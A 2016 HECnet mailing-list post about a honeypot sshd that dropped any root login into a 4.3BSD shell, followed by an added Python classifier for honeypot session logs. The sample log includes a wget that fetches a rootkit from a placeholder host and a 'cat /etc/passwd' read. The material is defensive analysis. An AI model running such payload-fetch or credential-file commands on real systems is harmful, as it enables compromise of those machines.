[HECnet] Botnet hits on 23/tcp

Jacob Goense dugo at xs4all.nl
Tue Oct 25 12:28:09 PDT 2016


On 2016-10-25 12:46, Johnny Billquist wrote:
> But it's hilarious to watch from RSX, how the script-kiddies try and 
> try...

For a while I had a patched up sshd running. I have the ssh config/patches still documented at http://www.eunet.it/tac8.html but never got around to writing up the rest. tldr; a root logon with any password seamlessly drops you into a 4.3BSD root shell. I thought hilarity would ensue.

A few observations.

Back then it was mostly China.

Some of the more clever botnets would start their brute force password
attempts with a long random password, probably to detect exactly what
I was doing, running a honeypot.

A large number of attempts to wget/curl a rootkit once in. Probably
scripted or copy/paste, but the lack of any follow up commands was
telling.

I had it up for about a year and nobody ever ruined the box. Actually,
only 2 people ever interactively explored the system.
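As an added example (not code from the post or from the HECnet list), a small Python classifier over constructed honeypot records that flags the two behaviours described above: a first login attempt made with a long random "canary" password, and a session that only fetches a payload with wget/curl and never follows up. The log format, addresses and thresholds are assumptions.

```python
import math
from collections import defaultdict

# Constructed honeypot records (not from the original post): one line per
# login attempt or executed command, as "seq source event value".
SAMPLE_LOG = """\
1 198.51.100.7 login Xk9#pLq2vW8mZt4rBn6yQe1s
2 198.51.100.7 login 123456
3 198.51.100.7 cmd wget http://example.invalid/rk.sh
4 203.0.113.9 login admin
5 203.0.113.9 login password
6 203.0.113.9 cmd uname -a
7 203.0.113.9 cmd cat /etc/passwd
8 203.0.113.9 cmd ls -la /root
"""

def shannon_entropy(s):
    """Bits per character; a long random string scores near log2(charset)."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def parse(log):
    """Group events by source address, keeping the sequence number for ordering."""
    sessions = defaultdict(list)
    for line in log.splitlines():
        seq, src, event, value = line.split(" ", 3)
        sessions[src].append((int(seq), event, value))
    return sessions

def classify(sessions, min_len=16, min_entropy=3.5):
    """Label each source with the session patterns the post describes."""
    verdicts = {}
    for src, events in sessions.items():
        events.sort()
        logins = [v for _, e, v in events if e == "login"]
        cmds = [v for _, e, v in events if e == "cmd"]
        tags = []
        first = logins[0] if logins else ""
        # A long, high-entropy first guess is a honeypot probe, not a real guess.
        if len(first) >= min_len and shannon_entropy(first) >= min_entropy:
            tags.append("canary-password")
        fetches = [c.split()[0] in ("wget", "curl") for c in cmds]
        if cmds and all(fetches):
            tags.append("fetch-only")      # scripted download, no follow-up
        elif len(cmds) > 1 and not any(fetches):
            tags.append("interactive")     # a human actually looking around
        verdicts[src] = tags
    return verdicts
```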

